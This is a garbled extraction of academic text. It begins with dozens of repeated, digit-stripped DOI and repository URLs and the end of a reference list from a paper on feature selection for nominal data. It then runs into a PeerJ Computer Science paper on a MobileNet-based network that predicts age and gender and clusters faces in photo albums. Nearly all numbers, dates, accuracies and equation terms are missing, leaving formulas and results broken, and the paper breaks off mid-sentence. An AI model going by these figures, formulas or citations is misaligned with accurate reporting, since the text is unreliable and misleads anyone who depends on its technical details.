http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://www.ics.uci.edu/~mlearn/mlrepository http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /tnn. . http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://jsgg.chinajournal.net.cn/wkc/webpublication/paperdigest.aspx http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. john gh, kohavi r, pfleger k. . irrelevant features and the subset selection problem. machine learning proceeds of the international conference : – . kira k, rendel la. . the feature selection problem: traditional methods and a new algorithm. in: aaai- proceedings. palo alto: aaai press, – . kwak n, ch c-h. . input feature selection for classification problems. ieee transactions on neural networks ( ): – doi . / . . kwak n, choi c-h. . input feature selection by mutual information based on parzenwindow. ieee transactions on pattern analysis and machine intelligence ( ): – doi . /tpami. . . liu z. . construction of bayesian networks based on mutual information, dissertations. shanghai: fudan university, – . li z, yang x, gu w et al. . kernel-improved support vector machine for semanteme data. applied mathematics and computation : – doi . /j.amc. . . . minho k, ramakrishna rs. . projected clustering for categorical datasets. pattern recognition letters : – doi . /j.patrec. . . . modrzejejew m. . feature selection using rough sets theory. in: proceedings of the europenn conference on machine learning. berlin, heidelberg: springer, – . peng h, long f, ding c. . feature selection based on mutual information: criteria of max-dependency, max-relevance, and min-redundancy. ieee transaction on pattern analysis and machine intelligence ( ): – doi . /tpami. . . tang w, mao k. . feature selection algorithm for data with both nominal and continuous features. in: advances in knowledge discovery and data mining. proceedings of the th pacific-asia conference, pakdd , hanoi, vietnam, may – , . berlin, heidelberg: springer, – . tang w, mao k. . feature selection algorithm for mixed data with both nominal and contin- uous features. pattern recognition letters ( ): – doi . /j.patrec. . . . tesmer m, estévez pa. . amifs: adaptive feature selection by using mutual information. in: neural networks, proceedings ieee international joint conference, vol. . – . torkkola k. . feature extraction by non-parametric mutual information maximization. journal of machine learning research : – . li and gu ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . / . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.amc. . . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /j.patrec. . . http://dx.doi.org/ . /peerj-cs. a redundancy-removing feature selection algorithm for nominal data introduction notation and related studies related work notation and definitions the proposed algorithms basic idea of the algorithms redundancy-removing feature selection algorithm results and discussion experimental data sets experimental results conclusions references efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet andrey v. savchenko , national research university higher school of economics, laboratory of algorithms and technologies for network analysis, nizhny novgorod, russia samsung-pdmi joint ai center, st. petersburg department of steklov institute of mathematics, st. petersburg, russia abstract this paper is focused on the automatic extraction of persons and their attributes (gender, year of born) from album of photos and videos. a two-stage approach is proposed in which, firstly, the convolutional neural network simultaneously predicts age/gender from all photos and additionally extracts facial representations suitable for face identification. here the mobilenet is modified and is preliminarily trained to perform face recognition in order to additionally recognize age and gender. the age is estimated as the expected value of top predictions in the neural network. in the second stage of the proposed approach, extracted faces are grouped using hierarchical agglomerative clustering techniques. the birth year and gender of a person in each cluster are estimated using aggregation of predictions for individual photos. the proposed approach is implemented in an android mobile application. it is experimentally demonstrated that the quality of facial clustering for the developed network is competitive with the state-of-the-art results achieved by deep neural networks, though implementation of the proposed approach is much computationally cheaper. moreover, this approach is characterized by more accurate age/gender recognition when compared to the publicly available models. subjects artificial intelligence, computer vision keywords facial representations, face clustering, age and gender recognition, convolutional neural networks introduction nowadays, due to the extreme increase in multimedia resources, there is an urgent need to develop intelligent methods to process and organize them (manju & valarmathie, ). for example, the task of automatic structuring of photo and video albums is attracting increasing attention (sokolova, kharchevnikova & savchenko, ; zhang & lu, ). the various photo organizing systems allow users to group and tag photos and videos in order to retrieve large number of images in the media library (he et al., ). the most typical processing of a gallery includes the faces grouping with automatic assignments of tags with the facial attributes (e.g., age and gender) to each subject in a group. the task of this paper is formulated as follows: given a large number of unlabeled how to cite this article savchenko av. . efficient facial representations for age, gender and identity recognition in organizing photo albums using multi-output convnet. peerj comput. sci. :e doi . /peerj-cs. submitted february accepted may published june corresponding author andrey v. savchenko, avsavchenko@hse.ru academic editor pinar duygulu additional information and declarations can be found on page doi . /peerj-cs. copyright savchenko distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:avsavchenko@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ facial images, cluster the images into individual persons (identities) (he et al., ) and predict age and gender of each person (rothe, timofte & van gool, ). this problem is usually solved using deep convolutional neural networks (convnets) (goodfellow, bengio & courville, ). at first, the clustering of photos and videos that contains the same person is performed using the known face verification (crosswhite et al., ; wang et al., ) and identification (savchenko & belova, ) methods. the age and gender of extracted faces can be recognized by other convnets (eidinger, enbar & hassner, ; rothe, timofte & van gool, ). though such an approach works rather well, it requires at least three different convnets, which increases the processing time, especially if the gallery should be organized on mobile platforms in offline mode. moreover, every convnet learns its own face representation, and the quality can be limited by the small size of the training set or the noise in the training data. for example, the latter issue is especially crucial for age prediction, as the most widely used imdb-wiki dataset contains incorrect ground truth values of age due to mistakes in the year when the photo was taken. such mistakes are introduced by an automatic crawling procedure used by rothe, timofte & van gool ( ). therefore, the goal of this research is to improve the efficiency of facial clustering and age and gender prediction by learning face representation using preliminarily training on domain of unconstrained face identification from very large database. the contribution of this paper can be formulated as follows. firstly, a multi-output extension of the mobilenet (howard et al., ) is specially developed. it is pre-trained to perform face recognition using the vggface dataset (cao et al., ). additional layers of the proposed network are fine-tuned for age and gender recognition on adience (eidinger, enbar & hassner, ) and imdb-wiki (rothe, timofte & van gool, ) datasets. secondly, it is proposed to estimate the age of the person by computing the expected value of top predictions in the age head of the proposed neural network. finally, a novel approach to face grouping is proposed, which deals with several challenges of processing of real-world photo and video albums. related works face clustering contemporary deep learning techniques (goodfellow, bengio & courville, ) can deal even with well-known crucial issues appeared in practical applications of face recognition, for example, unconstrained environment (various illumination and pose, partial occlusion) (learned-miller et al., ), or the small sample size problem (savchenko, ), when usually only single facial image per person is available. the latter problem is solved using transfer learning or domain adaptation methods (goodfellow, bengio & courville, ), in which large external datasets of celebrities are used to train deep convnet (cao et al., ; parkhi, vedaldi & zisserman, ). one of the main tasks of this paper is to group (cluster) the images into individual identities present in the given data with a large number of face images (he et al., ). in this task transfer learning techniques with fine-tuning of the convnet into the new training set of persons of interest is impossible because the images are unlabeled; that is, savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the setting is completely unsupervised. hence, traditional face clustering methods focus on finding effective face representation or appropriate dissimilarity measure between faces. the latter approach is examined by zhu, wen & sun ( ), who proposed a rank-order distance that measures the similarity between two faces using their neighboring information. shi, otto & jain ( ) designed a clustering algorithm, which directly estimates the adjacency matrix only based on the similarities between face images. this allows a dynamic selection of number of clusters and retains pairwise similarities between faces. however, the most accurate grouping in many practical tasks is still achieved by the usage of reliable face representations with consecutive agglomerative clustering (zhang et al., b). in this case, the convnet is pre-trained on external large dataset and is further applied to extract features of the training images from the limited sample of subjects using embeddings at one of the last layers (sharif razavian et al., ; savchenko, ). extraction of representative features (embeddings) is one the most important tasks in face recognition. taigman et al. ( ) provided one of the first implementations of convnets for face verification using the deepface descriptor trained with simple negative log-likelihood (“softmax”) loss. various regularizations of the loss functions have been studied in order to provide suitable representations. for example, center loss has been proposed by wen et al. ( ) in order to simultaneously learn a center for deep features of each class and penalize the distances between the deep features and their corresponding class centers. guo & zhang ( ) proposed underrepresented- classes promotion loss term, which aligns the norms of the weight vectors of the underrepresented-classes to those of the normal classes. the deep identification- verification features (deepid ) are learned by alternating identification and verification phases with different loss functions (sun et al., ). facenet descriptors (schroff, kalenichenko & philbin, ) were trained using special triplet loss with triplets of roughly aligned matching/non-matching face patches. recently, a family of angular and cosine margin-based losses have appeared. for example, the angular softmax loss was used to learn sphereface descriptors (liu et al., b). the arcface loss (deng et al., ) directly maximizes decision boundary in angular (arc) space based on the l - normalized weights and features. however, it is worth noting that the usage of softmax loss still gives the most accurate representations if the dataset is very large. cao et al. ( ) gathered vggface- dataset with m photos of k subjects and trained conventional resnet-based networks, which achieve state-of-the-art results in various face recognition tasks. recently, the research directions have been shifted into learning a compact embedding using convnets with low latency. for example, wu et al. ( ) introduced the concept of maxout activation and proposed a light convnet suitable for fast but still accurate face recognition. facial attributes recognition recognition of facial attributes appeared in many practical applications. for instance, one of the goals of video analysis in retail is to fill the advertisements with relevant information, interesting to a target group. in this paper, it was decided to focus on age and gender savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (kharchevnikova & savchenko, ), which are the most important attributes in the automatic organization of a gallery of photos. a decade ago traditional computer vision techniques, for example, classification of gabor features have been thoroughly studied (choi et al., ). nowadays, the most prominent results are achieved by deep convnets. for example, eidinger, enbar & hassner ( ) gather the adience dataset and trained the gender_net and age_net models, which achieved very accurate classification. also, rothe, timofte & van gool ( ) provided large imdb-wiki dataset and trained deep vgg- convnets, which achieved the state-of-the-art results in gender and age recognition. antipov et al. ( ) extended the paper (rothe, timofte & van gool, ) of and demonstrated that the transfer learning with the face recognition pre-training (rassadin, gruzdev & savchenko, ) is more effective for gender and age recognition compared to general pre-training using imagenet dataset. unfortunately, the above-mentioned convnet-based methods are characterized by considerable memory consumption and computational complexity. more importantly, the size of the datasets with labeled age and gender attributes is rather low when compared to the datasets used for face recognition mentioned in the previous subsection. it is rather obvious that the closeness among the facial processing tasks can be exploited in order to learn efficient face representations which boosts up their individual performances. hence, one of the main parts of this paper is to use the embeddings trained for face identification in order to predict age and gender of a given person. there exist several studies, which use such multi-task approach. for instance, han et al. ( ) trained a single convnet to classify several facial attributes. simultaneous face detection, landmark localization, pose estimation, and gender recognition is implemented in the paper (ranjan, patel & chellappa, ) by a single convnet. however, this model is primarily focused only on rather simple task of localization of a facial region (face detection). it does not extract useful facial representations (features) and cannot be used in face identification and/or clustering. another important example of simultaneous facial analysis is presented in the patent application (yoo et al., ). the task solved by this invention is rather close to the task considered in this paper, namely, prediction of identifier (id) and human attributes (age, gender, etc.) given a facial image using multi-task training. however, this device does not predict the birth year as it only classifies the age range, that is, “baby” ( – years), “child” ( – ), “senior” ( - : : : ), etc. secondly, all the recognition tasks (id and facial attributes) are trained simultaneously in this invention, which requires the training set to include facial images with known id and all attributes. in practice, the existing face datasets do not include all this information. hence, this method restricts the used training set, and, as a consequence, cannot provide the highest accuracies in all tasks. finally, this model predicts the id from a limited set of ids from the training set. hence, it cannot be used for face identification with small training samples because it does not implement the domain adaptation and is restricted to the ids from the given training set. more importantly it is impossible to apply this method for organizing the photo albums in completely unsupervised environment with unknown persons. savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ it seems that there is still a lack of studies devoted to simultaneous extraction of reliable representations and face attribute classification suitable for face grouping and age/gender prediction for each person using a set of his or her photos. multi-output convnet for simultaneous age, gender, and identity recognition in this paper, several different facial analytic tasks are considered. it is assumed that the facial regions are obtained in each image using any appropriate face detector; for example, either traditional multi-view cascade viola–jones classifier or more accurate convnet- based methods (zhang et al., a). the gender recognition task is a binary classification problem, in which the obtained facial image is assigned to one of two classes (male and female). the age prediction is the special case of regression problem, though sometimes it is considered as a multi-class classification with, for example, n = different classes, so that it is required to predict if an observed person is , , : : : or years old (rothe, timofte & van gool, ). in such a case, these two tasks become very similar and can be solved by traditional deep learning techniques. namely, the large facial dataset of persons with known age and/or gender is gathered; for example, the imdb-wiki (rothe, timofte & van gool, ). after that the deep convnet is learned to solve the classification task. the resulted networks can be applied to predict age and gender given a new facial image. the last task examined in this paper, namely, unconstrained face identification significantly differs from age and gender recognition. the unsupervised learning case is considered, in which facial images from a gallery set should be assigned to one of c � subjects (identities). domain adaptation (goodfellow, bengio & courville, ) is usually applied here: each image is described with the off-the-shelf feature vector using the deep convnet (sharif razavian et al., ), which has been preliminarily trained for the supervised face identification on large external dataset, for example, casia-webface, vggface/vggface , or ms-celeb- m. the l -normalized outputs at the one of last layers of this convnet for each rth gallery image are used as the d-dimensional feature vectors xr = [xr; , : : : , xr;d]. finally, any appropriate clustering method, that is, hierarchical agglomerative clustering (aggarwal & reddy, ), can be used to make a final decision for these feature vectors. in most research studies all these tasks are solved by independent convnets even though it is necessary to solve all of them. as a result, the processing of each facial image becomes time-consuming, especially for offline mobile applications (kharchevnikova & savchenko, ). in this paper it is proposed to solve all these tasks by the same convnet. in particular, it is assumed that the features extracted during face identification can be rather rich for any facial analysis. for example, it was shown the vggface features (parkhi, vedaldi & zisserman, ) can be used to increase the accuracy of visual emotion recognition (kaya, gürpnar & salah, ; rassadin, gruzdev & savchenko, ). as the main requirement in this study is the possibility to use the convnet on mobile platforms, it was decided to use straightforward modification of the mobilenet v (howard et al., ) (fig. ). this model contains sequentially connected savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ convolutional and depthwise convolutional layers, which proved to be memory efficient and provide excellent inference speed even on mobile devices. it is seven- and -times smaller than conventional resnet- and vgg models, respectively. what is more important, such small size of the model does not cause significant decrease of the recognition accuracy in various image recognition tasks. for example, top- accuracy on imagenet- of the mobilenet v ( . %) is only . % and . % lower when compared to the accuracy of vgg and resnet- , respectively. the bottom (backbone) part of the proposed network, namely, conventional mobilenet v pre-trained on imagenet- , extracts the representations suitable for face identification. the top part contains one new hidden layer with dropout regularization after extraction of identity features and two independent fully connected layers with softmax and sigmoid outputs for age and gender recognition, respectively. the learning of this model is performed incrementally, at first, the base mobilenet is trained for face identification on a very large facial dataset using conventional cross-entropy (softmax) loss. next, the last classification layer is removed, and the weights of the mobilenet base are frozen. finally, the remaining layers in the head are learned for age and gender recognition tasks by minimizing the sum of cross-entropies for both outputs. it is necessary to emphasize that not all images in most datasets of facial attributes contain information about both age and gender. moreover, some attribute may be completely unknown, if several datasets are united. as a result, the number of faces with both age and gender information is several times smaller when compared to the whole number of facial images. finally, the gender data for different ages is also very imbalanced. figure proposed convnet. full-size doi: . /peerj-cs. /fig- savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ thus, it was decided to train both heads of the convnet (fig. ) independently using different training data for age and gender classification. in particular, i alternate the mini-batches with age and gender info, and train only the part of the proposed network, that is, the weights of the fully connected layer in the age head of the proposed model are not updated for the mini-batch with the gender info. this convnet has the following advantages. first of all, it is obviously very efficient due to either usage of the mobilenet backbone or the possibility to simultaneously solve all three tasks (age, gender, and identity recognition) without need to implement an inference in three different networks. secondly, in contrast to the publicly available datasets for age and gender prediction, which are rather small (compared to the datasets for face recognition) and dirty, the proposed model exploit the potential of very large and clean face identification datasets to learn very good face representation. moreover, the hidden layer between the identity features and two outputs further combines the knowledge necessary to predict age and gender. as a result, the proposed model makes it possible to increase the accuracy of age/gender recognition when compared to the models trained only on specific datasets; for example, imdb-wiki or adience. proposed pipeline for organizing photo and video albums the complete data flow of the usage of the convnet (fig. ) for organizing albums with photos and videos the is presented in fig. . here faces in each photo are detected using the mtcnn (multi-task convolutional neural network) (zhang et al., a). next, an inference in the proposed convnet is performed for all detected faces xr in order to extract d-dimensional identity feature vector xr and predict age and gender. current age ar of the rth person is estimated by adding a difference between current date and the photo creation date to the predicted age. after that, all faces are clustered using the following figure proposed pipeline. full-size doi: . /peerj-cs. /fig- savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dissimilarity measure between identity features and birth year predictions of two facial images xr and xj: qðxr; xjÞ ¼k xr � xj k þw ðar � ajÞ ar þ aj ; ( ) where ||x|| is l norm and w � is a fixed weight (e.g., . ) of linear scalarization. the second term of ( ) was chosen for age distance in order to maximize the difference between small babies, who usually have similar identity features. as the number of subjects in the photo albums is usually unknown, a hierarchical agglomerative clustering is used (aggarwal & reddy, ). only rather large clusters with a minimal number of faces are retained during the cluster refinement. the gender and the birth year of a person in each cluster are estimated by appropriate fusion techniques (kharchevnikova & savchenko, , ); for example, simple voting or maximizing the average posterior probabilities at the output of the convnet (fig. ). for example, the product rule (kittler et al., ) can be applied if the independence of all facial images xr, r ∈ {r , : : : ,rm} in a cluster is naively assumed: max n f ;:::;ng ym m¼ pnðxrmÞ ¼ max n f ;:::;ng xm m¼ log pnðxrmÞ; ( ) where n is the total number of classes and pn (xrm) is the nth output of the convnet for the input image xrm. the same procedure is repeated for all video files. only each of, for example, three or five frames, is selected in each video clip, extract identity features of all detected faces and initially cluster only the faces found in this clip. after that the normalized average of identity features of all clusters (sokolova, kharchevnikova & savchenko, ) are computed. they are added to the dataset {xr} so that the “facial clustering” module handles both features of all photos and average feature vectors of subjects found in all videos. let me summarize the main novel parts of this pipeline. firstly, the simple age prediction by maximizing the output of the corresponding head of the proposed convnet is not accurate due to the imbalance of described training set, which leads to the decision in favor of one of the majority class. hence, it was decided to aggregate the outputs {pa(xr)} of the age head. however, i experimentally found that the combination of all outputs is again inaccurate, because the majority of subjects in the training set are – years old. thus, it is proposed to choose only l ∈ { , , : : : , na} indices {a , : : : , al} of the maximal outputs, where na is the number of different age classes. next, the expected mean �a xrð Þ for each gallery facial image xr is computed using normalized top outputs as follows: �a xrð Þ ¼ pl l¼ al � pal xrð Þ pl l¼ pal xrð Þ ( ) savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ secondly, the birth year of each face is estimated by subtracting the predicted age from the image file creation date. in such a case, it will be possible to organize the very large albums gathered over the years. the predicted birth year is used as an additional feature during the cluster analysis in order to partially overcome the known similarity of young babies in a family. the distance between two faces are computed as a sum of a distance between facial features and appropriately scaled distance ( ) between predicted current ages with respect to the photo creation dates. finally, several tricks in the cluster refinement module were implemented (fig. ). at first, the different faces appeared on the same photo are specially marked. as such faces must be stored in different groups, complete linkage clustering of every facial cluster is additionally performed. the distance matrix is designed so that the distances between the faces at the same photo are set to the maximum value, which is much larger than the threshold applied when forming flat clusters. moreover, it is assumed that the most valuable clusters of an owner of mobile device, his or her friends and relatives should not contain photos/videos taken in only one day. hence, a certain threshold ( day by default) for a number of days between the earliest and the eldest photo in a cluster is set in order to disambiguate large quantity of unimportant causal faces. the proposed approach (fig. ) was implemented as a part of a special mobile application for android (fig. ). the application may operate in offline mode and does not require an internet connection. it sequentially processes all photos from the gallery in a background thread. the demography pane provides stacked histograms (fig. a) of facial attributes of the largest extracted clusters (family members and friends). tapping on figure results of organization of the gallery in the mobile demo. photo credit: andrey v. savchenko. full-size doi: . /peerj-cs. /fig- savchenko ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ each bar within the horizontal stacked histogram in fig. a causes the list of all photos of a particular individual to be displayed (fig. b). it is important to emphasize at this point that entire photos rather than just faces extracted therefrom are presented in the display form of the application, so that photos with several persons can be exposed. if there are plural individuals with an identical gender and age range, then a spinner (combo box) can be provided on top of the display form, and that spinner is usable to select a particular person by an associated sequential number (fig. c). experimental results details of the training procedure in order to test the described approach (fig. ), i implemented it in a special software (https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity) using python language with the tensorflow and keras frameworks and the scikit-learn/ scipy/numpy libraries. my fine-tuned cnns are publicly available. the network (fig. ) has been trained as follows. at first, the weights of the backbone mobilenet are learned for face identification problem using , , facial images of , subjects from vggface dataset (cao et al., ). this base cnn was trained for epochs with early stopping on validation set of , other images using adam optimizer of softmax loss with learning rate . and decay e- . next, i populated the training dataset by k frontal cropped facial images from the imdb-wiki dataset (rothe, timofte & van gool, ). unfortunately, the age groups in this dataset are very imbalanced, so the trained models work incorrectly for faces of very young or old people. hence, it was decided to add all ( k) images from the adience (eidinger, enbar & hassner, ) dataset. as the latter contains only age intervals, for example, “( – ),” “( – ),” i put all images from this interval to the middle age, for example, “ ” or “ .” the resulted training set contains partially overlapped , images with gender label and , images with age label. the validation set includes other , labeled images with both age and gender available. in this study both age and gender recognition tasks are treated as classification problems with ng = (male/female) and ( , ,... years old) classes, respectively. the proposed network is fine-tuned on the gathered dataset in order to minimize the following joint loss function l ¼ � x g g log png ðxiÞ � x a a log pnaðxiÞ; ( ) which is computed as a sum of gender binary cross-entropy loss and age categorical cross-entropy loss. here pn(x) is the nth output of the convnet for the input image x, that is, the estimate of posterior probability of the nth class, g is a set of indices g of images in the training set with known gender label ng. similarly, set a contains indices a of training images with given age na. in order to compute the above-mentioned cross entropy loss functions, one-hot encoding is used for both age and gender labels. the top part of the network (fig. ) with frozen weights of the base cnn has been learned for three epochs using adam optimizer of the loss ( ) with alternate age/gender savchenko ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/hse-asavchenko/hse_facerec_tf/tree/master/age_gender_identity http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ batches. as a 